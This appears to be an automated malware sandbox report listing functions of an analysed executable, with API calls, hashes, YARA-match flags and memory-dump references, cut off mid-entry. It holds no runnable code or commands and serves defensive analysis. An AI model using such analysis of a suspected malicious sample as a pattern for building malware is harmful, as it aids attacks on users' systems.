                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                  • String ID:
                                                                  • API String ID: 4136887677-0
                                                                  • Opcode ID: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction ID: 1d15696ca511e8db17db0566d3fc480254b9efd771fcc7e6bea79be161feb034
                                                                  • Opcode Fuzzy Hash: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction Fuzzy Hash: EC31C232E00229EBCF20CBA6DD44AEE7B78EB14354F540C76E901F7290D6768E51DB98
                                                                  Function 00412E0F Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00412E2A
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412E36
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00412E3E
                                                                  • GetTickCount.KERNEL32 ref: 00412E46
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00412E52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: cf6504c454f8728ec9fffd442ed4ca1bfdc48b7cb4d0adf0ca51413743ca7f8e
                                                                  • Instruction ID: 34e95a29f25a6a58a344066bfba814387cfe7ca9964fe92030387c6fd27a6378
                                                                  • Opcode Fuzzy Hash: cf6504c454f8728ec9fffd442ed4ca1bfdc48b7cb4d0adf0ca51413743ca7f8e
                                                                  • Instruction Fuzzy Hash: 1BF0AF72D401249BCB209BF5ED8C49BB7F8FB183947860571DC11E7120D6349A518BD8
                                                                  Function 00427F61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpyA.KERNEL32(00000800,LOC), ref: 00427F84
                                                                  • LoadLibraryA.KERNEL32(?), ref: 00427FB7
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 00427FC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLibraryLoadLocalelstrcpy
                                                                  • String ID: LOC
                                                                  • API String ID: 864663389-519433814
                                                                  • Opcode ID: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
                                                                  • Instruction ID: 80581f1108e614f4ea904bb7e7a22fcd021204f87db94054b61d7c27fe4284fc
                                                                  • Opcode Fuzzy Hash: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
                                                                  • Instruction Fuzzy Hash: 9601F730B0C118EBDB14DB61ED45ADB376CEB00320F418562FA16E2190E738CA058BA9
                                                                  Function 02267740 Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "-$t<C7$t<C7$z}$Ei
                                                                  • API String ID: 0-1832362217
                                                                  • Opcode ID: e8d2fd9cd58a50925f43cca816ba68788b8f5ccbc1fbda49f8565b75a662cb90
                                                                  • Instruction ID: fdc78890633e496698b9ee955be1916b84a4ea558c7e5472ebecea036c82a0e4
                                                                  • Opcode Fuzzy Hash: e8d2fd9cd58a50925f43cca816ba68788b8f5ccbc1fbda49f8565b75a662cb90
                                                                  • Instruction Fuzzy Hash: A081AF72A153029FD314EFE4A84CA3BB7E6EB84608F40495DF45697258EBB0DD48CBD2
                                                                  Function 021C92DE Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "-$t<C7$t<C7$z}$Ei
                                                                  • API String ID: 0-1832362217
                                                                  • Opcode ID: e9951e02e279bf2fb8e96ac9af4ea0a0f1a4852d9572745ba4539eff4543d218
                                                                  • Instruction ID: cfb165a633ad725c63a47fd265266aeb1970fcc57638785fb2b1eae3753fcfdf
                                                                  • Opcode Fuzzy Hash: e9951e02e279bf2fb8e96ac9af4ea0a0f1a4852d9572745ba4539eff4543d218
                                                                  • Instruction Fuzzy Hash: BA812375A083019FC324EFA9D98462FB7E6ABD4304F64492DF066E7294E770D908CBC2
                                                                  Function 00422175 Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  • GetKeyState.USER32(00000010), ref: 00422199
                                                                  • GetKeyState.USER32(00000011), ref: 004221A2
                                                                  • GetKeyState.USER32(00000012), ref: 004221AB
                                                                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004221C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: State$LongMessageSendWindow
                                                                  • String ID:
                                                                  • API String ID: 1063413437-0
                                                                  • Opcode ID: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
                                                                  • Instruction ID: 81c6e2ddc2ea8cfb9092195715bcc3f3fea8f194ae87aed2471ca2276cf2a0cc
                                                                  • Opcode Fuzzy Hash: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
                                                                  • Instruction Fuzzy Hash: E2F0E93A34036B35D92436777D01FB610144F41BD8FC1053AB702FA1E2C9D98C125239
                                                                  Function 02266530 Relevance: 5.6, Strings: 4, Instructions: 596COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W$$ke@5$ke@5$l!`u
                                                                  • API String ID: 0-26469448
                                                                  • Opcode ID: 61b3e33a99d05dc8f4f4ee720d28fb33bd23e0cc6f898fd2b8d6158320bc4e19
                                                                  • Instruction ID: e2772d0aaba3dc3fae28a03d6167796c310e26a00c697fe4e6f5df22c63317c9
                                                                  • Opcode Fuzzy Hash: 61b3e33a99d05dc8f4f4ee720d28fb33bd23e0cc6f898fd2b8d6158320bc4e19
                                                                  • Instruction Fuzzy Hash: 3622C4736353028BC724EEE8954C23E76EAAB80644F54491EE585D7258EB78CDC8CBD3
                                                                  Function 021C80CE Relevance: 5.6, Strings: 4, Instructions: 596COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W$$ke@5$ke@5$l!`u
                                                                  • API String ID: 0-26469448
                                                                  • Opcode ID: 2884b0bae5a6a19bce542e2dc18d18ab15a0ccbe2a39f1a83be921a77ecd1377
                                                                  • Instruction ID: 8b090162244f49fc79cb280b46b617615e7f9a15b2fe8370e4762ebde20f4961
                                                                  • Opcode Fuzzy Hash: 2884b0bae5a6a19bce542e2dc18d18ab15a0ccbe2a39f1a83be921a77ecd1377
                                                                  • Instruction Fuzzy Hash: 8322F67D6893028FC729DE6895C412EB2E2ABE0754F36492EE485DB250DB70CD49CF93
                                                                  Function 02265070 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ]C$0$]C$0$tm6$tm6
                                                                  • API String ID: 0-1577568632
                                                                  • Opcode ID: f014a373a70ca616866e3e7aa87bab25042c40d8d945499d25ab5ce2f69e6b51
                                                                  • Instruction ID: c066ad98d9e48d7280410f9d47a51150b1ff668e1fdfee0f8f29d295e2e71cb2
                                                                  • Opcode Fuzzy Hash: f014a373a70ca616866e3e7aa87bab25042c40d8d945499d25ab5ce2f69e6b51
                                                                  • Instruction Fuzzy Hash: 4F61FE33F643025BDB14ABF8A89C73E72D6AB84644F454579E841DB25CEBB4CCA087D2
                                                                  Function 00405138 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fbee95fd32640656629873f4c0c1f8e77fd368f73bef6af2322a74aaf1a87359
                                                                  • Instruction ID: 115fe9c69a981daa85ad6d09c71b2a7e2a91efd6e6e23b9954665e00665e8930
                                                                  • Opcode Fuzzy Hash: fbee95fd32640656629873f4c0c1f8e77fd368f73bef6af2322a74aaf1a87359
                                                                  • Instruction Fuzzy Hash: 5BF01D31A00509BBDB11AF61CC08AAF3B69EF04344B448036BD16E91A0DB39CA52AF59
                                                                  Function 00418C23 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2581538701-0
                                                                  • Opcode ID: a516027a5dea26d4d3aed0b70c35799c8bea50a4f936aefafe38f625804ed68c
                                                                  • Instruction ID: fb5f48a2cbe7d67c7db75a5894104252e02d56561e96ab4636853aac3f066918
                                                                  • Opcode Fuzzy Hash: a516027a5dea26d4d3aed0b70c35799c8bea50a4f936aefafe38f625804ed68c
                                                                  • Instruction Fuzzy Hash: D0F03CB1963209ABDB00DF79ED097A93791EF45358F10253FE401922B0EB78448A9A4C
                                                                  Function 00403110 Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32 ref: 00403116
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 00403129
                                                                  • GetACP.KERNEL32 ref: 00403155
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID:
                                                                  • API String ID: 4232894706-0
                                                                  • Opcode ID: 8664cb59ba7dd997e7ec635e24899ba18fa4a6943adce1086579f5772061201b
                                                                  • Instruction ID: 15f08a42cf2b5940c6f0b721473c36998a81a7469e84b03b15026ae6cb722c36
                                                                  • Opcode Fuzzy Hash: 8664cb59ba7dd997e7ec635e24899ba18fa4a6943adce1086579f5772061201b
                                                                  • Instruction Fuzzy Hash: CAF0E931604220D6DF219F24AC455EB7F5C5F09B42F8401A9EACAAB251D634590A86B9
                                                                  Function 0040B0C2 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: 4
                                                                  • API String ID: 3519838083-4088798008
                                                                  • Opcode ID: 2a402ee6093a1f231630366a0ea499d196e2c672021f333dde40dd36f29b98d4
                                                                  • Instruction ID: 1099801c6d59d6ab35e296634a9bdd09ab04172776f0fa68687a2a885db39c20
                                                                  • Opcode Fuzzy Hash: 2a402ee6093a1f231630366a0ea499d196e2c672021f333dde40dd36f29b98d4
                                                                  • Instruction Fuzzy Hash: 77129671D00204EFDF15CF94D884AAEBBB1EF44318F2581AAE415BB2A2C779DD41CB99
                                                                  Function 022687D0 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6g4$6g4$Ei
                                                                  • API String ID: 0-2833161213
                                                                  • Opcode ID: 3ce074814773b661dacfec80cdc05c47e97d68e11ebfad48cf5969c9a9068b25
                                                                  • Instruction ID: bf408b690e351b1ef521a613183277e367b83521dc0a4d97bc5bef980b2bec28
                                                                  • Opcode Fuzzy Hash: 3ce074814773b661dacfec80cdc05c47e97d68e11ebfad48cf5969c9a9068b25
                                                                  • Instruction Fuzzy Hash: AA513867B203469BD624EAE9549CB7F3396EB84704F100829F905DB34CEB60CCC987A3
                                                                  Function 004186CD Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale_strncpy
                                                                  • String ID:
                                                                  • API String ID: 4025304676-0
                                                                  • Opcode ID: b81cfc970942e590f9552f47c2fe66bae61e9c19264fe2e5c6a06333c67db21d
                                                                  • Instruction ID: 92cad649ed57d9c4f7dea730e5b7efee1a6dc58236eb6692d72a71016bd40668
                                                                  • Opcode Fuzzy Hash: b81cfc970942e590f9552f47c2fe66bae61e9c19264fe2e5c6a06333c67db21d
                                                                  • Instruction Fuzzy Hash: 31212B322005079BDB1C4A38DE899FB7758E755304B38603FD426CA2E1EF69DEC6866D
                                                                  Function 0041B4A6 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                    • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041B4DC
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041B4FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoQueryVirtual$ByteCharLocaleMultiSystemWide
                                                                  • String ID:
                                                                  • API String ID: 2568233206-0
                                                                  • Opcode ID: 12c108d4cf4779910e3e8eab57d113375ac80130591dbd4aa47fa84aaa01938e
                                                                  • Instruction ID: f2541622a74e1565f35248a83cc35edda1dbb6fbaba1c69752cffed1fcd397c2
                                                                  • Opcode Fuzzy Hash: 12c108d4cf4779910e3e8eab57d113375ac80130591dbd4aa47fa84aaa01938e
                                                                  • Instruction Fuzzy Hash: E2017131801125FBCF219FA6DC498EF7B79EF49764F10812AF82467192CB384D91CAE8
                                                                  Function 0041B37F Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                    • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041B3B2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041B3D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoQueryVirtual$ByteCharLocaleMultiSystemWide
                                                                  • String ID:
                                                                  • API String ID: 2568233206-0
                                                                  • Opcode ID: d121f047767f915310f9b31e13b0e5c52d9dcba8b29d3aca7a8fce54d4a2d6b3
                                                                  • Instruction ID: 9064a4a59ad4b1b20ef4efccbf4baa795ced3658d65e74ed24f9717ec6d81bd5
                                                                  • Opcode Fuzzy Hash: d121f047767f915310f9b31e13b0e5c52d9dcba8b29d3aca7a8fce54d4a2d6b3
                                                                  • Instruction Fuzzy Hash: 0B01713180012DEACF229FA5DC458DF7A74EF44364B20422AF835721A0E7384DA19AD8
                                                                  Function 00418CA9 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _strlen.LIBCMT ref: 00418CAF
                                                                  • EnumSystemLocalesA.KERNEL32(00418B21,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418CE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: EnumLocalesSystem_strlen
                                                                  • String ID:
                                                                  • API String ID: 216762292-0
                                                                  • Opcode ID: e8acc64a1fcf76389094a5e509139040113b4b809680789caccdee514f4113e7
                                                                  • Instruction ID: e0b88c76b9a82806ba836f94aaffd3c9a494c367a0a9de59a6ec4d7828753495
                                                                  • Opcode Fuzzy Hash: e8acc64a1fcf76389094a5e509139040113b4b809680789caccdee514f4113e7
                                                                  • Instruction Fuzzy Hash: FEE01AF1E57205AAD7009F25ED46BA53B91EF00744F50617FE511821F1EA78458ACB9C
                                                                  Function 00403186 Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32 ref: 00403192
                                                                  • InterlockedExchange.KERNEL32(0043B13C,Function_00003110), ref: 004031B6
                                                                  Memory Dump Source
